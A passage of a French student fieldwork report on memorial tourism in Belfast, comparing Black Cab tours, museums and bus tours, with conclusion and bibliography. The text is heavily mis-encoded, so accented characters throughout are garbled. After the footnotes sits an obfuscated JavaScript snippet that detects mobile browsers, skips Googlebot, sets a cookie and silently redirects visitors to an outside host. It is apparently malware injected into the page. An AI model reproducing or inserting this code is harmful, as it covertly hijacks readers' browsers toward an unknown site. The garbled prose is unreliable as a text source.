rA�ceptifs lorsqua��une personne parle elle-mA?me de son histoire. En effet, la mise en scA?ne de son vA�cu personnel nous a poussA� A� ressentir de la compassion et nous a conduit A� une meilleure comprA�hension de sa position. Cet effet a A�tA� renforcA� par le fait que la visite A�tait interactive : notre conducteur rA�pondait volontiers A� toutes nos questions, mA?me si ces derniA?res A�taient parfois intimes. En discutant avec lui, nous avons eu la��impression de participer A� la co-construction de la mA�moire des Troubles, car nous pouvons dire qua��A� prA�sent, nous avons acquis une infime partie de la sienne.

Au vu de ces expA�riences touristiques, nous pouvons affirmer que la��une des modalitA�s de la��offre touristique belfastoise qui contribue A� la perpA�tuation de la mA�moire du conflit est la mise en scA?ne de rA�cits personnels dans une perspective interactive. Bien que cette modalitA� ne soit pas de mise partout, notre visite guidA�e du Loyalist Museum, notre tour en Black Cab, et la visite de la��Ulster Museum ont pour point commun de valoriser la mise en rA�cit dans le but de plonger le visiteur dans la dure rA�alitA� qui a sA�vi A� Belfast entre 1969 et 1998.

3.1.2 La valorisation de circuits pA�dagogiques

a) Une transmission unilatA�rale da��informations

Notre deuxiA?me hypothA?se qui stipule la mise en place de circuits pA�dagogiques stimulant la co-construction de mA�moire se voit rA�futA�e A� plusieurs reprises. PremiA?rement, nous avons trouvA� la visite du City Hall trA?s peu pA�dagogique dans le sens oA? il sa��agissait da��un tourisme oA? la��interaction avec le visiteur A�tait quasi inexistante. Un guide nous a accueilli et nous a prA�sentA� le City Hall en nous donnant beaucoup da��informations sans attendre de rA�flexions trA?s poussA�es de notre part. En effet, la quantitA� de matiA?re transmise par ce dernier A�tait telle qua��il nous A�tait difficile de rebondir sur ces informations. Le seul moment interactif dA�celA� lors de cette visite fut le moment oA? nous nous sommes assises sur la chaise du maire. Toutefois, nous ne pouvons qualifier cet A�pisode de pA�dagogique, mais uniquement da��interactif, car il ne nous a pas permis de comprendre pour autant le fonctionnement du systA?me politique belfastois.

Nous avons ressenti le mA?me manque de pA�dagogie lors du Belfast City Sightseeing open top Bus. Sur leur flyer, le fait de visiter les murals les plus cA�lA?bres de Belfast et de parcourir de long en large le Peacewall A�tait prA�sentA� comme un point fort de la compagnie. Cependant, ceci na��a A�tA� en fait qua��une infime partie de ce que le tour propose, et les informations relatives A� la thA�matique des Troubles se sont retrouvA�es noyA�es dans une masse d’informations, notamment relatives A� la��histoire du Titanic. Si nous A�tions des touristes en recherche da��un survol de la ville, cette visite aurait A�tA� amplement suffisante. Or, en tant que chercheuses nous avons trouvA� cette visite trA?s superficielle, ce qui nous a empA?chA� da��en saisir le fil conducteur. Ainsi, nous avons eu la��impression da��A?tre de simples spectatrices du fait que nous na��avons pas eu la��opportunitA� de manifester notre comprA�hension et/ou incomprA�hension des informations qui nous A�taient donnA�es.

Puis, nous avons jugA� important de visiter le musA�e officiel de la ville afin da��avoir un avis neutre sur le conflit. Nous nous sommes donc rendues A� la��Ulster Museum oA? nous avons pu explorer la section dA�diA�e aux Troubles. Loin da��A?tre inintA�ressante, cette exposition parle da��elle-mA?me, ca��est pourquoi elle ne nA�cessite pas la prA�sence da��un guide. Il sa��agit da��un espace oA? sont disposA�s des murs avec du texte et des images qui retracent la��histoire du conflit. Une fois encore, nous avons eu affaire A� une transmission unilatA�rale da��informations, sans interaction entre le visiteur et la��acteur de la��offre touristique. Nous na��avons dA�celA� aucun moyen pour le touriste de participer A� cette co-construction de mA�moire, par le biais de rA�flexions qui conduiraient le prestataire A� modifier son offre par rapport aux attentes du public. En ce qui concerne la plateforme des tA�moignages mentionnA�e dans notre premiA?re hypothA?se, elle est A�galement composA�e da��une partie nommA�e CAIN Web Service qui comprend des sources scientifiques et des articles divers A� propos du conflit. Cependant, mA?me si cette partie participe en quelque sorte A� la��assimilation de la mA�moire par le touriste, nous avons trouvA� cette derniA?re trA?s acadA�mique et peu accessible A� tout un chacun. En effet, il sa��agit da��articles scientifiques qui nA�cessitent une certaine connaissance prA�alable pour assurer leur comprA�hension. Ceci nous laisse penser que cette rubrique est plutA?t dirigA�e vers des chercheurs en quA?te da��informations prA�cises. Ainsi, cela contribue A� discriminer les individus disposant de peu de capital culturel dans le processus de perpA�tuation de la mA�moire.

Enfin, la derniA?re expA�rience qui nous oblige contre toute attente A� rA�futer notre deuxiA?me hypothA?se est celle du Loyalist Museum. En ce qui concerne la premiA?re partie nous prA�sentant le musA�e en tant que tel, le guide nous a donnA� beaucoup da��informations de faA�on trA?s unilatA�rale sans nous laisser la possibilitA� de poser des questions pendant la��intervention. Notre participation a donc A�tA� trA?s limitA�e et nous sommes devenues, une fois de plus, spectatrices da��une performance identitaire. Nous avons A�galement eu le mA?me ressenti lors de la seconde partie de la visite. En effet, le guide nous a parlA� en grande partie des forces armA�es protestantes en louant leurs A�A�exploitsA�A� sans chercher A� avoir un rA�el A�change avec le visiteur. La prA�sentation du quartier de East Belfast a A�tA� faite de maniA?re trA?s partiale. Notre capacitA� A� poser des questions A�tait passablement limitA�e et nous avons eu la��impression que nos remarques A� la��encontre de leur point de vue na��A�taient pas les bienvenues, ce qui a rendu la��atmosphA?re assez particuliA?re.

Avec un peu de recul, nous gardons la��impression que ce manque de pA�dagogie ne nous a pas conduit A� une assimilation optimale de la mA�moire. Cependant, ces critiques ne tiennent qua��A� nous, et nos attentes dA�finies au prA�alable ont sans doute biaisA� nos impressions.

b) PA�dagogie et construction de mA�moire

Bien que les arguments allant A� la��encontre de notre deuxiA?me hypothA?se soient nombreux, nous avons tout de mA?me pu assister A� des visites qui nous permettent de la vA�rifier. Nous avons eu la��occasion de visiter le Centre GaA�lique CultA?rlann McAdam A� Fiaich oA? nous avons A�tA� informA�es A� propos de la culture gaA�lique. MalgrA� le fait que la thA�matique des Troubles na��ait pas A�tA� abordA�e, nous avons jugA� pertinent de mentionner cette visite dans le cadre de notre deuxiA?me hypothA?se, car elle montre cette modalitA� pA�dagogique du tourisme. En effet, le but de ce centre est la perpA�tuation de la culture gaA�lique. Pour ce faire, il nous a A�tA� distribuA� A� chacun un petit livret avec les expressions courantes traduites de la��anglais au gaA�lique. Il y a donc eu une rA�elle interaction entre le guide et nous-mA?mes ce qui a rendu la visite plus pA�dagogique, tout en nous immergeant bien dans la problA�matique en question.

Enfin, la visite qui contribue le plus A� la vA�rification de notre deuxiA?me hypothA?se est sans doute le tour en Black Cab. ArrivA�es vers notre taxi, le guide-conducteur sa��est prA�sentA� en nous demandant ce que nous voulions savoir sur Belfast.

Ca��est exactement A� ce genre da��attitude que nous nous attendions dans le cadre da��un tourisme pA�dagogique. En effet, notre guide sa��est assurA� de savoir ce qui nous intA�ressait afin de ne pas sa��attarder sur des A�lA�ments historiques na��ayant qua��une importance secondaire pour nous. Tout au long de notre rencontre, ce dernier a adaptA� son parcours en fonction de nos attentes et nos dA�sirs, crA�ant ainsi un vA�ritable A�change. Ce dernier sa��est A� plusieurs reprises inquiA�tA� de savoir si nous comprenions bien, en nous demandant toujours si nous avions des questions. Lorsqua��il sa��est aperA�u que nous prenions beaucoup de notes sur notre carnet de terrain, il sa��est empressA� de nous proposer de descendre du taxi afin de spatialiser son rA�cit. Bien que sa vision du conflit soit biaisA�e par son positionnement politico-religieux, cela na��A�tait pas gA?nant, car nous sentions bien qua��il A�tait ouvert A� la discussion et A� nos remarques. A plusieurs reprises, nous avons eu la��opportunitA� de lui poser des questions personnelles, il na��a jamais montrA� de mA�contentement A� notre A�gard et sa��est toujours arrangA� pour nous rA�pondre de la meilleure faA�on possible.

Pour conclure, on constate donc que la��offre touristique proposant des circuits pA�dagogiques est mince, mais pas inexistante. Nous sommes conscientes que nous na��avons pas expA�rimentA� toutes les formes de tourisme A� Belfast, mais nous avons tout de mA?me pu remarquer que les visites sont souvent mises en place de maniA?re unilatA�rale en ne cherchant pas da��A�change constructif avec le visiteur. La grande exception est donc celle de la visite avec les Black Cabs qui nous a permis da��avoir une interaction active et constructive avec le guide, A�galement acteur du conflit.

3.2 Tourisme et territorialisation mA�morielle

Afin de voir si les modalitA�s touristiques contribuant A� la perpA�tuation de la mA�moire tendent A� le faire en certains lieux spA�cifiques, nous allons analyser la dimension spatiale de nos expA�riences.

Pour ce qui est de notre City Tour en bus, la mA�moire du conflit tend A� A?tre spatialisA�e dans les quartiers de Falls et de Shankill, mais nous ne sommes passA�es que trA?s rapidement en ces lieux. Certes, la visite de ces quartiers contribue A� la diffusion da��une image A� la��A�tranger par le biais da��une territorialisation de la mA�moire, mais notre passage A�tait trop rapide pour affirmer qua��il existe un rA�el lien entre les souvenirs du conflit et certains lieux. Tel na��a pas A�tA� le cas avec la compagnie de taxi : notre chauffeur nous a conduit plus ou moins dans les mA?mes lieux que le bus, mais da��une toute autre maniA?re. Alors que nous ne faisions que passer devant les murals lors de notre City Tour, nous avions cette fois la��opportunitA� de descendre du taxi et ainsi de pratiquer la��espace. La��effet de territorialisation de la mA�moire dans certaines rues de Falls et Shankill A�tait bien plus fort, car nous avons eu la��opportunitA� de marcher dans les rues tout en A�coutant les expA�riences personnelles de notre chauffeur. Enfin, lors de la visite du quartier de East Belfast, notre guide avait tendance A� spatialiser la mA�moire du conflit en certains lieux emblA�matiques.

Ce dernier sa��est arrA?tA� plusieurs fois dans des mA�moriels protestants et sa��attardait devant certaines fresques emblA�matiques des groupes armA�s loyalistes, ce qui avait pour effet da��ancrer son rA�cit en certains lieux spA�cifiques. Cet effet de territorialisation de la mA�moire est efficace : A� la��avenir, nous associerons les souvenirs A�voquA�s par notre guide A� certains lieux prA�cis, que nous pouvons alors qualifier de lieux de mA�moire

Pour conclure, nous avons vu que la mA�moire tend gA�nA�ralement A� A?tre territorialisA�e dans certaines rues emblA�matiques des quartiers de Shankill et Falls. Aussi, nous constatons que certains lieux ou monuments, tels que les murals les plus cA�lA?bres, les grands mA�moriaux ou de maniA?re gA�nA�rale les quartiers emblA�matiques traversA�s par les peacelines, figurent de maniA?re rA�currente dans les propositions de circuits touristiques. Cela peut A?tre dA� A� leur caractA?re artistique da��une part et politique de la��autre. Cependant, bien que nous puissions dA�celer dans les deux derniA?res visites mentionnA�es un processus de territorialisation de la mA�moire, nous estimons que cela na��est pas suffisant pour vA�rifier cette troisiA?me hypothA?se.

4. Conclusion

Lorsque nous sommes arrivA�es A� Belfast, nous avons dA� faire face A� certaines difficultA�s. En effet, nous avions une idA�e passablement arrA?tA�e sur la forme qua��allait prendre notre travail de terrain. Par exemple, au dA�but de nos recherches, nous A�tions trA?s focalisA�es sur le contenu des discours tenus par les acteurs de la��offre touristique. Or, nous nous sommes vite aperA�ues que dans le cadre de notre travail, le contenu importait moins que la forme et la maniA?re de prA�senter les A�vA�nements passA�s dans le processus de co-construction mA�morielle. Peu A� peu, nous nous en sommes rendues compte et nous avons modifiA� notre maniA?re de rA�colter nos donnA�es afin que ces derniA?res nous apportent de rA�els A�lA�ments de rA�ponses. Nous avons donc cessA� de prendre note des informations factuelles qui nous A�taient transmises et nous nous sommes concentrA�es sur le comportement et la��attitude des acteurs de la��offre touristique.

En conclusion, notre sA�jour A� Belfast nous a effectivement permis de relever deux modalitA�s de la��offre touristique belfastoise qui tendent A� inclure le visiteur A� la production de mA�moire. En effet, nous avons constatA� que certains acteurs mettent bien en place des circuits pA�dagogiques et valorisent les rA�cits personnels dans le but de perpA�tuer la mA�moire du conflit. Bien que ces deux modalitA�s ne soient pas gA�nA�ralisables A� la��entiA?retA� de la��offre touristique belfastoise, nous estimons que nos donnA�es sont suffisantes pour vA�rifier nos deux hypothA?ses relatives A� la mise en scA?ne de rA�cits personnels et de circuits pA�dagogiques dans le cadre da��un tourisme mA�moriel.

Aussi, notre travail de terrain nous a permis de rA�pondre de maniA?re plus ou moins complA?te A� la premiA?re partie de notre question de recherche. Tel ne fut pas le cas pour notre troisiA?me hypothA?se relative A� la territorialisation de la mA�moire dans le cadre du tourisme belfastois. Comme mentionnA� ci-dessus, nous manquons da��informations afin da��affirmer qua��il existe un rA�el processus de territorialisation mA�morielle. Bien que nous soyons restA�es plus da��une semaine A� Belfast, nous na��avons pas eu le temps de rA�colter le matA�riel nA�cessaire afin de mener A� bien une analyse exhaustive de ce processus. Une agence touristique nous a proposA� un walking tour dont il aurait A�tA� intA�ressant de comparer le parcours avec ceux proposA�s par le City Tour et les Black Cabs. Malheureusement, nous nous sommes vues prises par le temps et nous avons dA� renoncer A� cette opportunitA�. Da��autres facteurs nous ont freinA�es dans la��analyse des processus de territorialisation mA�morielle, notamment notre manque da��expA�rience et de connaissances en la matiA?re. Aussi, la littA�rature relative A� ce sujet est passablement lacunaire, bien que certains auteurs aient thA�orisA� le concept de lieu de mA�moire, notamment A-C. Morand (2009), J-D. Urbain (2003), et A. Hertzog (2012). Ces A�lA�ments nous ont empA?chA� de maA�triser rA�ellement cette thA�matique, ce qui a entravA� nos recherches sur le terrain.

Pour aller plus loin, dans le cadre da��une recherche plus globale et reprA�sentative, il serait intA�ressant de multiplier les expA�riences touristiques afin da��avoir une rA�elle vision da��ensemble de ce qui est proposA� A� Belfast. En effet, le programme proposA� par nos enseignantes A�tant assez chargA�, nous avons dA�cidA� de concentrer nos recherches sur les visites prA�vues. Quitte A� diminuer la reprA�sentativitA� de nos rA�sultats ainsi que leur potentielle gA�nA�ralisation, nous avons prA�fA�rA� mener une analyse approfondie da��un nombre restreint de visites et de prospectus. Si nous nous A�tions basA�es sur un trop large panel da��expA�riences touristiques, cela nous aurait conduit A� une analyse plus superficielle du matA�riau collectA�.

Enfin, nous avons conscience que notre analyse a A�tA� passablement non-exhaustive A�tant donnA� le temps qui nous A�tait imparti. Il serait intA�ressant da��analyser en profondeur les logiques de spatialisation de la mA�moire des acteurs de la��offre touristique. En effet, cette thA�matique revA?t da��un grand intA�rA?t de par son caractA?re inA�dit, relativement inexplorA� et intrinsA?quement liA� A� la gA�ographie. Une fois la territorialisation de la mA�moire thA�orisA�e, une voie A� suivre afin da��aller encore plus loin pourrait A?tre da��analyser les buts de la crA�ation des lieux de mA�moire et leurs effets rA�els sur la population locale et A�trangA?re.

5. Bibliographie

CAIN Web Service (2006). Some Frequently Asked Questions a�� The Northern Ireland Conflict [En ligne]. http://cain.ulst.ac.uk/faq/faq2.htm#when (consultA� le 30 mars 2016).

BALLIF Florine (2014). A�A�A�Belfast en temps de paix : la guerre civile comme attraction touristiqueA�. TA�oros [En ligne], Vol. 34, NA�1-2, pp.2-23. https://teoros.revues.org/2761 (ConsultA� le 20 mars 2016).

BALLIF Florine (2012). A�A�Les peacelines de Belfast : le provisoire qui dureA�A�. HermA?s, La Revue [En ligne], Vol.2, NA�63, pp.116-119. https://www.cairn.info/load_pdf.php?ID_ARTICLE=HERM_063_0116 (ConsultA� le 1 fA�vrier 2016).

BROWN Kris, MACGINTY Roger (2003). A�A�Public attitudes toward partisan and neutral symbols in post-agreement Northern IrelandA�A�. IdentitiesA�: Global studies in culture and power [en ligne], Vol.10 NA�1, pp.83-108. http://www.tandfonline.com/doi/abs/10.1080/10702890304337 (ConsultA� le 16 fA�vrier 2016)

CRAHAY FrA�dA�ric (2014). A�A�Tourisme mA�morielA�A�. TA�moigner. Entre histoire et mA�moire. Revue pluridisciplinaire de la Fondation Auschwitz, NA�117, pp. 151-152.

EQUIPE M. I. T. (2000). A�A�La mise en tourisme des lieux: un outil de diagnosticA�A�.A� Mappemonde, Vol. 57, NA�1, pp. 1-6.

HERNANDEZ Julie (2008). A�A�Le tourisme macabre A� La Nouvelle-OrlA�ans aprA?s Katrina : rA�silience et mA�morialisation des espaces affectA�s par des catastrophes majeuresA�A�. Norois [en ligne], Vol.3, NA�208, pp. 61-73. http://norois.revues.org/2208 (ConsultA� le 16 fA�vrier 2016).

HERTZOG Anne (2012). A�A�Tourisme de mA�moire et imaginaire touristique des champs de batailleA�A�. Via, Revue internationale interdisciplinaire de tourisme [En ligne], NA�1, pp.1-16.http://viatourismreview.com/wp-content/uploads/2015/06/Article6.pdf (ConsultA� le 16 fA�vrier 2016).

LEGRAND Caroline (2002). A�A�Du tourisme gA�nA�alogique dans l’Irlande contemporaineA�A�. Revue de SynthA?se, Vol.123, NA�1, pp. 131-147.

LISLE Debbie (2006). A�A�Local symbols, global networks: rereading the murals of BelfastA�A�. Alternatives: Global, Local, Political, Vol. 31, NA�1, pp. 27-52.

MORAND Anne-CA�line (2009). MA�moires de Belfast: Les processus de la mise en tourisme de la mA�moire et leurs expressions spatiales. MA�moire professionnelA�: UniversitA� de Paris 1, PanthA�on Sorbonne, 190p. https://www.univ-paris1.fr/fileadmin/IREST/Memoires_Masters_2/MORAND_Anne-Celine.pdf (ConsultA� le 12 fA�vrier 2016).

NAEF Patrick James (2013). A�A�Tourisme de mA�moire, instrument de paix et/ou de rA�conciliationA�A�. Quand le tourisme questionne la mA�moire [En ligne], pp.70-80. https://archive-ouverte.unige.ch/unige:27745 (ConsultA� le 2 juin 2016).

PETITIER Paule (1989). A�A�Les Lieux de mA�moireA�A�. Romantisme [En ligne], Vol. 19, NA�63, pp. 103-110. www.persee.fr/doc/roman_0048-8593_1989_num_19_63_5570 (ConsultA� le 13 fA�vrier 2016).

URBAIN Jean-Didier (2003). A�A�Tourisme de mA�moire : un travail de deuil positifA�A�. Cahier Espaces, NA�80, pp.5-7.

Photographie A� la une: MA�moriel dans le quartier de East Belfast,A�par Valentina Ferreira GutiA�rrez, mars 2016.

[1] CAIN Web service [en ligne], http://cain.ulst.ac.uk/faq/faq2.htm#when consultA� le 20 mai 2012

[2] UFFA�: Real Ulster Freedom Fighters a�� UDAA�: Ulster Defense Association a�� UYMA�: Ulster Young Militance

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}